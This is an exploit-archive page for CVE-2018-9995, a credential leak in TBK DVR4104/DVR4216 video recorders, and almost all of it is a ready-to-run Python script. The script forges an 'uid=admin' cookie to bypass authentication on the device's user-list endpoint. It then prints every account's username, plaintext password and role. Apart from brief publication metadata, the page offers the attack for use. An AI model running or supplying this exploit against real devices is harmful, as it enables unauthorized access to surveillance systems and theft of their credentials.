TBK DVR4104 / DVR4216 - Credentials Leak



EKU-ID: 7583 CVE: 2018-9995 OSVDB-ID:
Author: ezelf Published: 2018-05-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# -*- coding: utf-8 -*-
import json
import requests
import argparse
import tableprint as tp
 
class Colors:
    BLUE        = '\033[94m'
    GREEN       = '\033[32m'
    RED         = '\033[0;31m'
    DEFAULT     = '\033[0m'
    ORANGE      = '\033[33m'
    WHITE       = '\033[97m'
    BOLD        = '\033[1m'
    BR_COLOUR   = '\033[1;37;40m'
 
banner = '''
                             __..--.._
      .....              .--~  .....  `.
    .":    "`-..  .    .' ..-'"    :". `
    ` `._ ` _.'`"(     `-"'`._ ' _.' '
         ~~~      `.          ~~~
                  .'
                 /
                (
                 ^---'
 
 
 [*] @capitan_alfa
'''
 
details = '''
 # Exploit Title:   DVRs; Credentials Exposed
 # Date:            09/04/2018
 # Exploit Author:  Fernandez Ezequiel ( @capitan_alfa )
'''
parser = argparse.ArgumentParser(prog='getDVR_Credentials.py',
                                description=' [+] Obtaining Exposed credentials',
                                epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81',
                                version="1.1")
 
parser.add_argument('--host',   dest="HOST",    help='Host',    required=True)
parser.add_argument('--port',   dest="PORT",    help='Port',    default=80)
 
args    =   parser.parse_args()
 
HST     =   args.HOST
port    =   args.PORT
 
headers = {}
 
fullHost_1  =   "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list"
host        =   "http://"+HST+":"+str(port)+"/"
 
print Colors.GREEN+banner+Colors.DEFAULT
 
 
def makeReqHeaders(xCookie):
    headers["Host"]             =  host
    headers["User-Agent"]       = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)"
    headers["Accept"]           = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
    headers["Accept-Languag"]   = "es-AR,en-US;q=0.7,en;q=0.3"
    headers["Connection"]       = "close"
    headers["Content-Type"]     = "text/html"
    headers["Cookie"]           = "uid="+xCookie
    
    return headers
 
try:
    rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000)
except Exception,e:
    print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT
    exit()
 
badJson = rX.text
try:
    dataJson = json.loads(badJson)
    totUsr = len(dataJson["list"])   #--> 10
except Exception, e:
    print " [+] Error: "+str(e)
    print " [>] json: "+str(rX)
#    print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin"))
    exit()
 
 
print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN
print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT
 
print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT
print " "
 
final_data = []
try:
    for obj in range(0,totUsr):
 
        temp = []
 
        _usuario    = dataJson["list"][obj]["uid"]
        _password   = dataJson["list"][obj]["pwd"]
        _role       = dataJson["list"][obj]["role"]
 
        temp.append(_usuario)
        temp.append(_password)
        temp.append(_role)
 
        final_data.append(temp)
 
        hdUsr  = Colors.GREEN + "Username" + Colors.DEFAULT
        hdPass = Colors.GREEN + "Password" + Colors.DEFAULT
        hdRole = Colors.GREEN + "Role ID"  + Colors.DEFAULT
 
        cabeceras = [hdUsr, hdPass, hdRole]
 
    tp.table(final_data, cabeceras, width=20)
 
except Exception, e:
    print "\n [!]: "+str(e)
    print " [+] "+ str(dataJson)
 
print "\n"